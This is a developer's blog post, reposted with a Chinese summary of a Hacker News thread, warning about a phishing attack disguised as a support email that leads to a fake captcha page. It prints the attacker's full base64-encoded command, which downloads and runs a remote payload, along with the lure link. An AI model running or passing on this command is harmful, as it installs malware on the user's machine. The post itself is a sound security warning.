我收到过的最可怕的“用户支持”邮件

我收到过的最可怕的“用户支持”邮件
The scariest "user support" email I've received

原始链接: https://www.devas.life/the-scariest-user-support-email-ive-ever-received/

## 警惕复杂的网络钓鱼攻击开发者Takuya最近经历了一次令人不安的网络钓鱼尝试，攻击者通过看似无害的支持请求针对他。一封邮件声称由于cookie同意问题无法访问他的网站（而他的网站甚至不存在此问题）。在礼貌地要求更多信息后，收到了一封后续邮件，其中包含一个指向“截图”的链接——该链接被Gmail标记为垃圾邮件，但Takuya最初信任了它。点击该链接会跳转到一个欺骗性页面，要求进行“验证步骤”，涉及一个终端命令。意识到危险后，Takuya避免了执行，确认这是一个恶意脚本，旨在从远程服务器下载并运行代码。这次经历凸显了日益复杂的网络钓鱼策略，伪装成合法的支持请求，并利用令人信服但又略有缺陷的沟通方式。Takuya还注意到他的论坛上出现了一些可疑的、可能由AI生成的帖子。他敦促开发者保持警惕，因为攻击者正变得越来越聪明，也越来越难被发现。**切勿执行来自不受信任来源的命令。**

## 黑客新闻讨论摘要：网络钓鱼攻击与对人工智能的依赖一个黑客新闻帖子讨论了一起最近的网络钓鱼尝试，用户收到一个包含base64编码字符串的支持请求，该字符串旨在在macOS系统上执行恶意代码。解码后的字符串会下载并运行一个远程访问木马（RAT），能够窃取敏感数据。讨论强调了对日益增长的、不太复杂但可能有效的网络钓鱼攻击的担忧。许多评论者对需要依赖诸如ChatGPT之类的工具来分析此类字符串表示失望，认为base64解码等基本技能应该为开发者和精通技术的用户所熟知。一个关键的争论点是，使用ChatGPT分析代码是否是一种谨慎的安全措施（在沙盒环境中运行），还是技术技能下降的迹象。几位用户指出ChatGPT在这种特定情况下存在不准确之处。该帖子还涉及更广泛的问题，例如在线安全日益复杂、大型科技公司在促成诈骗（如Google Sites）方面的作用，以及人工智能既可以帮助又可以加剧这些威胁的可能性。普遍的担忧是，随着技术技能的下降，个人将更容易受到越来越复杂的攻击。

原文

Hi, it's Takuya. As your app grows in popularity, you occasionally start to attract attacks aimed directly at you—the developer or site owner. Just the other day, I got one that was honestly terrifying, so I'd like to share it.

The Email

Subject: Cookie consent prevents platform access

Hello,
I cannot access use the store.
The cookie consent notice keeps appearing and nothing happens once I approve or try to close it, so I’m unable to
interact with the website.
Please provide guidance on how to resolve this or provide an alternative solution so I can access?

In short, they’re saying:

“I can’t use your site because the cookie consent keeps blocking access.”

Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that.

Still, I replied politely:

Can you tell me which Url, your OS, and browser?
Kind regards,
Takuya

A bit later, I got this reply (which Gmail had automatically placed in the spam folder):

Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot.
https://sites.google.com/view/drive-845fro3buhxi/screen?fileid=15034204
Please take a look and suggest the next steps.

At first glance, it looked perfectly normal. But notice — they never actually told me which page was causing the issue. Instead, they sent a link claiming to contain a screenshot. It looked like a Google Drive link, but it was actually a Google Sites page. Without thinking, I clicked it. (You should never do this!)

The Trap

It showed a Captcha screen.
I clicked it… and got this:

It said something like “verification step” — telling me to open a terminal, paste a command, and run it. That’s when it hit me: “Oh no, this is phishing.”

The command they had copied to my clipboard was this:

echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d | bash

Never run anything like this in your terminal. It downloads and executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it:

Absolutely terrifying.

Because Gmail had flagged the second message as spam, the URL was probably already reported as malicious. But the first message wasn’t flagged — so I thought, “Maybe it’s a false positive,” and replied. Big mistake.

Even on my user forum, I’ve started seeing suspicious posts that seem to be written by AI. They look natural at first glance, but the intent is unclear — often just spam or trolling.

Phishing emails disguised as support inquiries are getting more sophisticated, too.
They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.

It’s unsettling. Stay alert, guys — the attacks are getting smarter. Hope it's helpful!